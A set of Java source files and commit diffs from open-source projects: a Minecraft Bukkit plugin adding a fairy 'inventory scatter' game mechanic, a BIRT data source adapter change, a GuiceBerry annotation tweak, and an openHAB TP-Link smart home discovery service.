org.bukkit.potion.Potion; import org.bukkit.potion.PotionEffect; import org.bukkit.potion.PotionEffectType; import org.bukkit.potion.PotionType; import org.bukkit.util.Vector; import java.util.*; import java.util.concurrent.ConcurrentHashMap; import java.util.logging.Logger; /** * Author: Turtle9598 */ public class EnchantedForest extends AbstractRegionedArena implements MonitoredArena, Listener { private final CommandBook inst = CommandBook.inst(); private final Logger log = inst.getLogger(); private final Server server = CommandBook.server(); private AdminComponent adminComponent; private final Random random = new Random(); private ConcurrentHashMap<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> map = new ConcurrentHashMap<>(); public EnchantedForest(World world, ProtectedRegion region, AdminComponent adminComponent) { super(world, region); this.adminComponent = adminComponent; //noinspection AccessStaticViaInstance inst.registerEvents(this); } @Override public void forceRestoreBlocks() { BaseBlock b; for (Map.Entry<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> e : map.entrySet()) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); } map.clear(); } @Override public void run() { equalize(); restoreBlocks(); } @Override public void disable() { forceRestoreBlocks(); } @Override public String getId() { return getRegion().getId(); } @Override public void equalize() { for (Player player : getContainedPlayers()) { try { adminComponent.deadmin(player); } catch (Exception e) { log.warning("The player: " + player.getName() + " may have an unfair advantage."); } } } @Override public ArenaType getArenaType() { return ArenaType.MONITORED; } public void restoreBlocks() { int min = 1000 * 60 * 170; BaseBlock b; Map.Entry<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> e; Iterator<Map.Entry<Location,AbstractMap.SimpleEntry<Long,BaseBlock>>> it = map.entrySet().iterator(); while(it.hasNext()) { e = it.next(); if ((System.currentTimeMillis() - e.getValue().getKey()) > min) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); it.remove(); } else if (System.currentTimeMillis() - e.getValue().getKey() > (min / 20) && EnvironmentUtil.isShrubBlock(e.getValue().getValue().getType())) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); it.remove(); } } } private List<ItemStack> getRandomDropSet(CommandSender player) { // Create the Sacrifice int amt, value; if (ChanceUtil.getChance(59)) { amt = 64; value = 5248; } else { amt = 8; value = 88; } // Sacrifice and make loot list List<ItemStack> loot; do { loot = SacrificeComponent.getCalculatedLoot(player, amt, value); } while (loot == null || loot.size() < 1); // Shuffle and return loot for variety Collections.shuffle(loot); return loot; } private void eatFood(Player player) { if (player.getSaturation() - 1 >= 0) { player.setSaturation(player.getSaturation() - 1); } else if (player.getFoodLevel() - 1 >= 0) { player.setFoodLevel(player.getFoodLevel() - 1); } } private void trick(final Player player) { if (ChanceUtil.getChance(256)) { final PlayerInventory pInv = player.getInventory(); switch (ChanceUtil.getRandom(2)) { case 1: boolean hasAxe = true; switch (pInv.getItemInHand().getTypeId()) { case ItemID.DIAMOND_AXE: pInv.addItem(new ItemStack(ItemID.DIAMOND, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.GOLD_AXE: pInv.addItem(new ItemStack(ItemID.GOLD_BAR, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.IRON_AXE: pInv.addItem(new ItemStack(ItemID.IRON_BAR, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.WOOD_AXE: pInv.addItem(new ItemStack(BlockID.WOOD, 2), new ItemStack(ItemID.STICK, 2)); break; default: hasAxe = false; ChatUtil.sendWarning(player, "The fairy couldn't find an axe and instead throws a rock" + "at you."); player.damage(7); player.setVelocity(new Vector( random.nextDouble() * 2.0 - 1.5, random.nextDouble() * 1, random.nextDouble() * 2.0 - 1.5) ); } if (hasAxe) { ChatUtil.sendWarning(player, "The fairy breaks your axe."); server.getScheduler().runTaskLater(inst, new Runnable() { @Override public void run() { player.getInventory().setItemInHand(null); } }, 1); } break; case 2: // Make potion ItemStack potion = new Potion(PotionType.INSTANT_DAMAGE).toItemStack(1); PotionMeta pMeta = (PotionMeta) potion.getItemMeta(); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.INCREASE_DAMAGE, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.REGENERATION, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.DAMAGE_RESISTANCE, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.WATER_BREATHING, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.FIRE_RESISTANCE, 20 * 600, 2), false); pMeta.setDisplayName(ChatColor.WHITE + "Extreme Combat Potion"); potion.setItemMeta(pMeta); // Give potion ChatUtil.sendWarning(player, "You might need this friend ;)"); getWorld().dropItemNaturally(player.getLocation(), potion); int waves = 5 * ChanceUtil.getRandom(3); for (int i = 0; i < waves; i++) { server.getScheduler().scheduleSyncDelayedTask(inst, new Runnable() { @Override public void run() { ChatUtil.sendNotice(getContainedPlayers(), "Slimes away guys!"); BlockVector min = getRegion().getMinimumPoint(); BlockVector max = getRegion().getMaximumPoint(); short sOut = 1000; com.sk89q.worldedit.Vector v; for (int i = 0; i < 25 * ChanceUtil.getRandom(4); i++) { sOut--; if (sOut < 0) break; v = LocationUtil.pickLocation(min.getX(), max.getX(), min.getZ(), max.getZ()); v = v.add(0, 83, 0); if (getRegion().contains(v.getBlockX(), v.getBlockY(), v.getBlockZ())) { Block b = getWorld().getBlockAt(v.getBlockX(), v.getBlockY(), v.getBlockZ()); if (b.getTypeId() == BlockID.AIR || EnvironmentUtil.isShrubBlock(b.getTypeId())) { Slime s = (Slime) getWorld().spawnEntity(b.getLocation(), EntityType.SLIME); s.setSize(ChanceUtil.getRandom(8)); s.setRemoveWhenFarAway(false); continue; } } i--; } } }, 20 * 7 * (i + 1)); } server.getScheduler().scheduleSyncDelayedTask(inst, new Runnable() { @Override public void run() { ChatUtil.sendNotice(getContainedPlayers(), "Release the god slime!"); BlockVector min = getRegion().getMinimumPoint(); BlockVector max = getRegion().getMaximumPoint(); short sOut = 1000; com.sk89q.worldedit.Vector v; for (int i = 0; i < ChanceUtil.getRandom(1); i++) { sOut--; if (sOut < 0) break; v = LocationUtil.pickLocation(min.getX(), max.getX(), min.getZ(), max.getZ()); v = v.add(0, 83, 0); if (getRegion().contains(v.getBlockX(), v.getBlockY(), v.getBlockZ())) { Block b = getWorld().getBlockAt(v.getBlockX(), v.getBlockY(), v.getBlockZ()); if (BlockType.canPassThrough(b.getTypeId())) { Slime s = (Slime) getWorld().spawnEntity(b.getLocation(), EntityType.SLIME); s.setSize(16); s.setRemoveWhenFarAway(false); continue; } } i--; } } }, 20 * 7 * (waves + 1)); break; } } } @EventHandler(priority = EventPriority.HIGHEST, ignoreCancelled = true) public void onBlockBreak(BlockBreakEvent event) { final Player player = event.getPlayer(); final Block block = event.getBlock(); ItemStack itemInHand = player.getItemInHand(); if (!adminComponent.isAdmin(player) && contains(block) && (block.getTypeId() == BlockID.LOG || EnvironmentUtil.isShrubBlock(block)) && itemInHand != null) { if (block.getTypeId() == BlockID.LOG) { short c = 0; for (ItemStack aItemStack : getRandomDropSet(player)) { if (c >= 3) break; getWorld().dropItemNaturally(block.getLocation(), aItemStack); c++; } event.setExpToDrop(ChanceUtil.getRandom(4)); eatFood(player); trick(player); } map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); } else if (contains(block)) { event.setCancelled(true); ChatUtil.sendWarning(player, "You cannot break this block for some reason."); } } @EventHandler(priority = EventPriority.MONITOR, ignoreCancelled = true) public void onLeafDecay(LeavesDecayEvent event) { if (contains(event.getBlock())) { Block block = event.getBlock(); map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); if (!ChanceUtil.getChance(14)) return; getWorld().dropItemNaturally(block.getLocation(), getRandomDropSet(server.getConsoleSender()).get(0)); } } @EventHandler(ignoreCancelled = true) public void onItemSpawn(ItemSpawnEvent event) { if (contains(event.getEntity())) { for (Location l : map.keySet()) { if (l.getBlock().equals(event.getEntity().getLocation().getBlock())) { int is = event.getEntity().getItemStack().getTypeId(); if (is == BlockID.LOG || is == BlockID.SAPLING) { event.setCancelled(true); } return; } } } } @EventHandler(ignoreCancelled = true) public void onPlayerDropItem(PlayerDropItemEvent event) { if (contains(event.getItemDrop())) { for (Location l : map.keySet()) { if (event.getItemDrop().getLocation().getBlock().equals(l.getBlock())) { int is = event.getItemDrop().getItemStack().getTypeId(); if (is == BlockID.LOG || is == BlockID.SAPLING) { ChatUtil.sendError(event.getPlayer(), "You can't drop that here."); event.setCancelled(true); } return; } } } } @EventHandler(ignoreCancelled = true) public void onBlockPlace(BlockPlaceEvent event) { Player player = event.getPlayer(); if (!adminComponent.isAdmin(player) && contains(event.getBlock()) && !inst.hasPermission(player, "aurora.mine.builder")) { event.setCancelled(true); ChatUtil.sendNotice(player, ChatColor.DARK_RED, "You don't have permission for this area."); } } @EventHandler(priority = EventPriority.MONITOR, ignoreCancelled = true) public void onBucketFill(PlayerBucketFillEvent event) { if (contains(event.getBlockClicked())) { final Block block = event.getBlockClicked(); map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); } } @EventHandler(ignoreCancelled = true) public void onBucketEmpty(PlayerBucketEmptyEvent event) { if (contains(event.getBlockClicked())) { event.setCancelled(true); ChatUtil.sendNotice(event.getPlayer(), ChatColor.DARK_RED, "You don't have permission for this area."); } } @EventHandler(ignoreCancelled = true) public void onEggHatch(EggHatchEvent event) { if (contains(event.getEgg())) event.setCancelled(true); } }
Added an inventory scatter attack for fairies in the Enchanted Forest
src/main/java/com/skelril/aurora/city/engine/arena/EnchantedForest.java
Added an inventory scatter attack for fairies in the Enchanted Forest
<ide><path>rc/main/java/com/skelril/aurora/city/engine/arena/EnchantedForest.java <ide> package com.skelril.aurora.city.engine.arena; <ide> <add>import com.google.common.collect.Lists; <ide> import com.sk89q.commandbook.CommandBook; <ide> import com.sk89q.worldedit.BlockVector; <ide> import com.sk89q.worldedit.blocks.BaseBlock; <ide> import org.bukkit.block.Block; <ide> import org.bukkit.command.CommandSender; <ide> import org.bukkit.entity.EntityType; <add>import org.bukkit.entity.Item; <ide> import org.bukkit.entity.Player; <ide> import org.bukkit.entity.Slime; <ide> import org.bukkit.event.EventHandler; <ide> <ide> if (ChanceUtil.getChance(256)) { <ide> final PlayerInventory pInv = player.getInventory(); <del> switch (ChanceUtil.getRandom(2)) { <add> switch (ChanceUtil.getRandom(3)) { <ide> case 1: <ide> boolean hasAxe = true; <ide> switch (pInv.getItemInHand().getTypeId()) { <ide> } <ide> }, 20 * 7 * (waves + 1)); <ide> break; <del> <add> case 3: <add> List<ItemStack> toDrop = Lists.newArrayList(pInv.getArmorContents()); <add> toDrop.addAll(Arrays.asList(pInv.getContents())); <add> for (ItemStack aDrop : toDrop) { <add> if (aDrop == null || aDrop.getTypeId() == BlockID.AIR) continue; <add> Item item = getWorld().dropItem(player.getLocation(), aDrop); <add> item.setVelocity(new Vector( <add> random.nextDouble() * 2 - 1, <add> random.nextDouble() * 1, <add> random.nextDouble() * 2 - 1 <add> )); <add> } <add> pInv.setArmorContents(null); <add> pInv.clear(); <add> ChatUtil.sendNotice(player, "The fair throws your stuff all over the place"); <ide> } <ide> } <ide> }
Java
epl-1.0
2113e8d17077e565eb1337d32814da417a8d915c
0
sguan-actuate/birt,rrimmana/birt-1,rrimmana/birt-1,rrimmana/birt-1,rrimmana/birt-1,Charling-Huang/birt,sguan-actuate/birt,sguan-actuate/birt,sguan-actuate/birt,Charling-Huang/birt,Charling-Huang/birt,Charling-Huang/birt,Charling-Huang/birt,sguan-actuate/birt,rrimmana/birt-1
/* ************************************************************************* * Copyright (c) 2006 Actuate Corporation. * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * which accompanies this distribution, and is available at * http://www.eclipse.org/legal/epl-v10.html * * Contributors: * Actuate Corporation - initial API and implementation * ************************************************************************* */ package org.eclipse.birt.report.data.adapter.internal.adapter; import java.util.Iterator; import java.util.Map; import org.eclipse.birt.core.data.Constants; import org.eclipse.birt.core.exception.BirtException; import org.eclipse.birt.core.script.JavascriptEvalUtil; import org.eclipse.birt.data.engine.api.querydefn.OdaDataSourceDesign; import org.eclipse.birt.report.data.adapter.api.AdapterException; import org.eclipse.birt.report.data.adapter.i18n.ResourceConstants; import org.eclipse.birt.report.model.api.ExtendedPropertyHandle; import org.eclipse.birt.report.model.api.OdaDataSourceHandle; import org.mozilla.javascript.Scriptable; /** * Adapts a Model ODA data source handle to equivalent DtE * oda data source definition */ public class OdaDataSourceAdapter extends OdaDataSourceDesign { private Scriptable bindingScope; /** * Creates adaptor based on Model OdaDataSourceHandle. * @param source model handle * @param propBindingScope Javascript scope in which to evaluate property bindings. If null, * property bindings are not evaluated. */ public OdaDataSourceAdapter( OdaDataSourceHandle source, Scriptable propBindingScope) throws BirtException { super(source.getQualifiedName()); bindingScope = propBindingScope; // Adapt base class properties DataAdapterUtil.adaptBaseDataSource( source, this ); // Adapt extended data source elements // validate that a required attribute is specified String driverName = source.getExtensionID( ); if ( driverName == null || driverName.length( ) == 0 ) { throw new AdapterException( ResourceConstants.DATASOURCE_EXID_ERROR, source.getName( ) ); } setExtensionID( driverName ); // static ROM properties defined by the ODA driver extension Map staticProps = DataAdapterUtil.getExtensionProperties( source, source.getExtensionPropertyDefinitionList( ) ); if ( staticProps != null && !staticProps.isEmpty( ) ) { Iterator propNamesItr = staticProps.keySet( ).iterator( ); while ( propNamesItr.hasNext( ) ) { String propName = ( String ) propNamesItr.next( ); assert ( propName != null ); String propValue; // If property binding expression exists, use its evaluation // result String bindingExpr = source.getPropertyBinding( propName ); if ( bindingScope != null && bindingExpr != null && bindingExpr.length( ) > 0 ) { propValue = JavascriptEvalUtil.evaluateScript( null, bindingScope, bindingExpr, "property binding", 0 ).toString(); } else { propValue = ( String ) staticProps.get( propName ); } addPublicProperty( propName, propValue ); } } // private driver properties / private runtime data Iterator elmtIter = source.privateDriverPropertiesIterator( ); if ( elmtIter != null ) { while ( elmtIter.hasNext( ) ) { ExtendedPropertyHandle modelProp = ( ExtendedPropertyHandle ) elmtIter .next( ); addPrivateProperty( modelProp.getName( ), modelProp .getValue( ) ); } } // TODO: move ModeDteApiAdpter there in future addPropertyConfigurationId( this ); } /** * Adds the externalized property configuration id for use by * a BIRT consumer application's propertyProvider extension. */ private void addPropertyConfigurationId( OdaDataSourceDesign dteSource ) throws BirtException { String configIdValue = dteSource.getExtensionID( ) + Constants.ODA_PROP_CONFIG_KEY_SEPARATOR + dteSource.getName( ); dteSource.addPublicProperty( Constants.ODA_PROP_CONFIGURATION_ID, configIdValue ); } }
data/org.eclipse.birt.report.data.adapter/src/org/eclipse/birt/report/data/adapter/internal/adapter/OdaDataSourceAdapter.java
/* ************************************************************************* * Copyright (c) 2006 Actuate Corporation. * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * which accompanies this distribution, and is available at * http://www.eclipse.org/legal/epl-v10.html * * Contributors: * Actuate Corporation - initial API and implementation * ************************************************************************* */ package org.eclipse.birt.report.data.adapter.internal.adapter; import java.util.Iterator; import java.util.Map; import org.eclipse.birt.core.exception.BirtException; import org.eclipse.birt.core.script.JavascriptEvalUtil; import org.eclipse.birt.data.engine.api.querydefn.OdaDataSourceDesign; import org.eclipse.birt.report.data.adapter.api.AdapterException; import org.eclipse.birt.report.data.adapter.i18n.ResourceConstants; import org.eclipse.birt.report.model.api.ExtendedPropertyHandle; import org.eclipse.birt.report.model.api.OdaDataSourceHandle; import org.mozilla.javascript.Scriptable; /** * Adapts a Model ODA data source handle to equivalent DtE * oda data source definition */ public class OdaDataSourceAdapter extends OdaDataSourceDesign { private Scriptable bindingScope; /** * Creates adaptor based on Model OdaDataSourceHandle. * @param source model handle * @param propBindingScope Javascript scope in which to evaluate property bindings. If null, * property bindings are not evaluated. */ public OdaDataSourceAdapter( OdaDataSourceHandle source, Scriptable propBindingScope) throws BirtException { super(source.getQualifiedName()); bindingScope = propBindingScope; // Adapt base class properties DataAdapterUtil.adaptBaseDataSource( source, this ); // Adapt extended data source elements // validate that a required attribute is specified String driverName = source.getExtensionID( ); if ( driverName == null || driverName.length( ) == 0 ) { throw new AdapterException( ResourceConstants.DATASOURCE_EXID_ERROR, source.getName( ) ); } setExtensionID( driverName ); // static ROM properties defined by the ODA driver extension Map staticProps = DataAdapterUtil.getExtensionProperties( source, source.getExtensionPropertyDefinitionList( ) ); if ( staticProps != null && !staticProps.isEmpty( ) ) { Iterator propNamesItr = staticProps.keySet( ).iterator( ); while ( propNamesItr.hasNext( ) ) { String propName = ( String ) propNamesItr.next( ); assert ( propName != null ); String propValue; // If property binding expression exists, use its evaluation // result String bindingExpr = source.getPropertyBinding( propName ); if ( bindingScope != null && bindingExpr != null && bindingExpr.length( ) > 0 ) { propValue = JavascriptEvalUtil.evaluateScript( null, bindingScope, bindingExpr, "property binding", 0 ).toString(); } else { propValue = ( String ) staticProps.get( propName ); } addPublicProperty( propName, propValue ); } } // private driver properties / private runtime data Iterator elmtIter = source.privateDriverPropertiesIterator( ); if ( elmtIter != null ) { while ( elmtIter.hasNext( ) ) { ExtendedPropertyHandle modelProp = ( ExtendedPropertyHandle ) elmtIter .next( ); addPrivateProperty( modelProp.getName( ), modelProp .getValue( ) ); } } } }
CheckIn:Fix SCR85066 clearCache in ReportEngineService not working properly
data/org.eclipse.birt.report.data.adapter/src/org/eclipse/birt/report/data/adapter/internal/adapter/OdaDataSourceAdapter.java
CheckIn:Fix SCR85066 clearCache in ReportEngineService not working properly
<ide><path>ata/org.eclipse.birt.report.data.adapter/src/org/eclipse/birt/report/data/adapter/internal/adapter/OdaDataSourceAdapter.java <ide> import java.util.Iterator; <ide> import java.util.Map; <ide> <add>import org.eclipse.birt.core.data.Constants; <ide> import org.eclipse.birt.core.exception.BirtException; <ide> import org.eclipse.birt.core.script.JavascriptEvalUtil; <ide> import org.eclipse.birt.data.engine.api.querydefn.OdaDataSourceDesign; <ide> .getValue( ) ); <ide> } <ide> } <add> <add> // TODO: move ModeDteApiAdpter there in future <add> addPropertyConfigurationId( this ); <ide> } <add> <add> /** <add> * Adds the externalized property configuration id for use by <add> * a BIRT consumer application's propertyProvider extension. <add> */ <add> private void addPropertyConfigurationId( OdaDataSourceDesign dteSource ) <add> throws BirtException <add> { <add> String configIdValue = dteSource.getExtensionID( ) <add> + Constants.ODA_PROP_CONFIG_KEY_SEPARATOR + dteSource.getName( ); <add> dteSource.addPublicProperty( Constants.ODA_PROP_CONFIGURATION_ID, <add> configIdValue ); <add> } <add> <ide> }
Java
apache-2.0
36f68722d54c30bc3f6ffea52fd3e77deb599bec
0
yongchristophertang/guiceberry,stackoverflowmailer/guiceberry,kfowler/guiceberry,paarsar/guiceberry,zorzella/guiceberry
/* * Copyright (C) 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.inject.testing.guiceberry; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.lang.annotation.Target; import com.google.inject.Scope; import com.google.inject.ScopeAnnotation; /** * This defines a {@link Scope} that lasts for a single test. * * <p>A test conceptually comes in scope when it starts and goes out of scope * when it finishes its execution (e.g., on JUnit lingo, roughly at the moment * of {@link junit.framework.TestCase#setUp()} and * {@link junit.framework.TestCase#tearDown()}). * * @see com.google.inject.testing.guiceberry.junit3.JunitTestScope for the JUnit-specific implementation of this scope * * @author Luiz-Otavio Zorzella * @author Danka Karwanska */ @Target({ElementType.TYPE, ElementType.METHOD}) @Retention(RetentionPolicy.RUNTIME) @ScopeAnnotation public @interface TestScoped {}
src/com/google/inject/testing/guiceberry/TestScoped.java
/* * Copyright (C) 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.inject.testing.guiceberry; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.lang.annotation.Target; import com.google.inject.Scope; import com.google.inject.ScopeAnnotation; /** * This defines a {@link Scope} that lasts for a single test. * * <p>A test conceptually comes in scope when it starts and goes out of scope * when it finishes its execution (e.g., on JUnit lingo, roughly at the moment * of {@link junit.framework.TestCase#setUp()} and * {@link junit.framework.TestCase#tearDown()}). * * @see com.google.inject.testing.guiceberry.junit3.JunitTestScope for the JUnit-specific implementation of this scope * * @author Luiz-Otavio Zorzella * @author Danka Karwanska */ @Target(ElementType.TYPE) @Retention(RetentionPolicy.RUNTIME) @ScopeAnnotation public @interface TestScoped {}
Support methods in TestScoped annotation to accomodate those that are using provider methods
src/com/google/inject/testing/guiceberry/TestScoped.java
Support methods in TestScoped annotation to accomodate those that are using provider methods
<ide><path>rc/com/google/inject/testing/guiceberry/TestScoped.java <ide> * @author Luiz-Otavio Zorzella <ide> * @author Danka Karwanska <ide> */ <del>@Target(ElementType.TYPE) <add>@Target({ElementType.TYPE, ElementType.METHOD}) <ide> @Retention(RetentionPolicy.RUNTIME) <ide> @ScopeAnnotation <ide> public @interface TestScoped {}
Java
epl-1.0
0b8538a5b92547ea1f3a4d7cdb543c0fbefcf133
0
theoweiss/openhab2,gerrieg/openhab2,gerrieg/openhab2,clinique/openhab2,theoweiss/openhab2,Snickermicker/openhab2,Snickermicker/openhab2,clinique/openhab2,afuechsel/openhab2,digitaldan/openhab2,theoweiss/openhab2,gerrieg/openhab2,Snickermicker/openhab2,clinique/openhab2,afuechsel/openhab2,Snickermicker/openhab2,digitaldan/openhab2,afuechsel/openhab2,digitaldan/openhab2,theoweiss/openhab2,digitaldan/openhab2,gerrieg/openhab2,clinique/openhab2
/** * Copyright (c) 2010-2018 by the respective copyright holders. * * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * which accompanies this distribution, and is available at * http://www.eclipse.org/legal/epl-v10.html */ package org.openhab.binding.tplinksmarthome.internal; import static org.openhab.binding.tplinksmarthome.internal.TPLinkSmartHomeThingType.SUPPORTED_THING_TYPES; import java.io.IOException; import java.net.DatagramPacket; import java.net.DatagramSocket; import java.net.InetAddress; import java.net.SocketTimeoutException; import java.net.UnknownHostException; import java.util.Locale; import java.util.Map; import java.util.Optional; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ScheduledFuture; import java.util.concurrent.TimeUnit; import org.eclipse.jdt.annotation.NonNullByDefault; import org.eclipse.jdt.annotation.Nullable; import org.eclipse.smarthome.config.discovery.AbstractDiscoveryService; import org.eclipse.smarthome.config.discovery.DiscoveryResult; import org.eclipse.smarthome.config.discovery.DiscoveryResultBuilder; import org.eclipse.smarthome.config.discovery.DiscoveryService; import org.eclipse.smarthome.core.thing.ThingTypeUID; import org.eclipse.smarthome.core.thing.ThingUID; import org.openhab.binding.tplinksmarthome.internal.model.Sysinfo; import org.osgi.service.component.annotations.Component; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * The {@link TPLinkSmartHomeDiscoveryService} detects new Smart Home Bulbs, Plugs and Switches by sending a UDP network * broadcast and parsing the answer into a thing. * * @author Christian Fischer - Initial contribution * @author Hilbrand Bouwkamp - Complete make-over, reorganized code and code cleanup. */ @Component(service = { DiscoveryService.class, TPLinkIpAddressService.class }, immediate = true, configurationPid = "discovery.tplinksmarthome") @NonNullByDefault public class TPLinkSmartHomeDiscoveryService extends AbstractDiscoveryService implements TPLinkIpAddressService { private static final String BROADCAST_IP = "255.255.255.255"; private static final int DISCOVERY_TIMEOUT_SECONDS = 8; private static final int UDP_PACKET_TIMEOUT_MS = (int) TimeUnit.SECONDS.toMillis(DISCOVERY_TIMEOUT_SECONDS - 1); private static final long REFRESH_INTERVAL_MINUTES = 1; private final Logger logger = LoggerFactory.getLogger(TPLinkSmartHomeDiscoveryService.class); private final Commands commands = new Commands(); private final Map<String, String> idInetAddressCache = new ConcurrentHashMap<>(); private final DatagramPacket discoverPacket; private final byte[] buffer = new byte[2048]; private @NonNullByDefault({}) DatagramSocket discoverSocket; private @NonNullByDefault({}) ScheduledFuture<?> discoveryJob; public TPLinkSmartHomeDiscoveryService() throws UnknownHostException { super(SUPPORTED_THING_TYPES, DISCOVERY_TIMEOUT_SECONDS); InetAddress broadcast = InetAddress.getByName(BROADCAST_IP); byte[] discoverbuffer = CryptUtil.encrypt(Commands.getSysinfo()); discoverPacket = new DatagramPacket(discoverbuffer, discoverbuffer.length, broadcast, Connection.TP_LINK_SMART_HOME_PORT); } @Override public @Nullable String getLastKnownIpAddress(String deviceId) { return idInetAddressCache.get(deviceId); } @Override protected void startBackgroundDiscovery() { discoveryJob = scheduler.scheduleWithFixedDelay(this::startScan, 0, REFRESH_INTERVAL_MINUTES, TimeUnit.MINUTES); } @Override protected void stopBackgroundDiscovery() { stopScan(); if (discoveryJob != null && !discoveryJob.isCancelled()) { discoveryJob.cancel(true); discoveryJob = null; } } @Override protected void startScan() { logger.debug("Start scan for TP-Link Smart devices."); synchronized (this) { try { idInetAddressCache.clear(); discoverSocket = sendDiscoveryPacket(); // Runs until the socket call gets a time out and throws an exception. When a time out is triggered it // means no data was present and nothing new to discover. while (true) { if (discoverSocket == null) { break; } DatagramPacket packet = new DatagramPacket(buffer, buffer.length); discoverSocket.receive(packet); logger.debug("TP-Link Smart device discovery returned package with length {}", packet.getLength()); if (packet.getLength() > 0) { detectThing(packet); } } } catch (SocketTimeoutException e) { logger.debug("Discovering poller timeout..."); } catch (IOException e) { logger.debug("Error during discovery: {}", e.getMessage()); } finally { closeDiscoverSocket(); removeOlderResults(getTimestampOfLastScan()); } } } @Override protected void stopScan() { logger.debug("Stop scan for TP-Link Smart devices."); closeDiscoverSocket(); super.stopScan(); } /** * Opens a {@link DatagramSocket} and sends a packet for discovery of TP-Link Smart Home devices. * * @return Returns the new socket * @throws IOException exception in case sending the packet failed */ protected DatagramSocket sendDiscoveryPacket() throws IOException { DatagramSocket ds = new DatagramSocket(null); ds.setBroadcast(true); ds.setSoTimeout(UDP_PACKET_TIMEOUT_MS); ds.send(discoverPacket); logger.trace("Discovery package sent."); return ds; } /** * Closes the discovery socket and cleans the value. No need for synchronization as this method is called from a * synchronized context. */ private void closeDiscoverSocket() { if (discoverSocket != null) { discoverSocket.close(); discoverSocket = null; } } /** * Detected a device (thing) and get process the data from the device and report it discovered. * * @param packet containing data of detected device * @throws IOException in case decrypting of the data failed */ private void detectThing(DatagramPacket packet) throws IOException { String ipAddress = packet.getAddress().getHostAddress(); String rawData = CryptUtil.decrypt(packet.getData(), packet.getLength()); Sysinfo sysinfoRaw = commands.getSysinfoReponse(rawData); Sysinfo sysinfo = sysinfoRaw.getActualSysinfo(); logger.trace("Detected TP-Link Smart Home device: {}", rawData); String deviceId = sysinfo.getDeviceId(); logger.debug("TP-Link Smart Home device '{}' with id {} found on {} ", sysinfo.getAlias(), deviceId, ipAddress); idInetAddressCache.put(deviceId, ipAddress); Optional<ThingTypeUID> thingTypeUID = getThingTypeUID(sysinfo.getModel()); if (thingTypeUID.isPresent()) { ThingUID thingUID = new ThingUID(thingTypeUID.get(), deviceId.substring(deviceId.length() - 6, deviceId.length())); Map<String, Object> properties = PropertiesCollector.collectProperties(thingTypeUID.get(), ipAddress, sysinfoRaw); DiscoveryResult discoveryResult = DiscoveryResultBuilder.create(thingUID).withLabel(sysinfo.getAlias()) .withRepresentationProperty(deviceId).withProperties(properties).build(); thingDiscovered(discoveryResult); } else { logger.debug("Detected, but ignoring unsupported TP-Link Smart Home device model '{}'", sysinfo.getModel()); } } /** * Finds the {@link ThingTypeUID} based on the model value returned by the device. * * @param model model value returned by the device * @return {@link ThingTypeUID} or null if device not recognized */ private Optional<ThingTypeUID> getThingTypeUID(String model) { String modelLC = model.toLowerCase(Locale.ENGLISH); return SUPPORTED_THING_TYPES.stream().filter(suid -> modelLC.startsWith(suid.getId())).findFirst(); } }
addons/binding/org.openhab.binding.tplinksmarthome/src/main/java/org/openhab/binding/tplinksmarthome/internal/TPLinkSmartHomeDiscoveryService.java
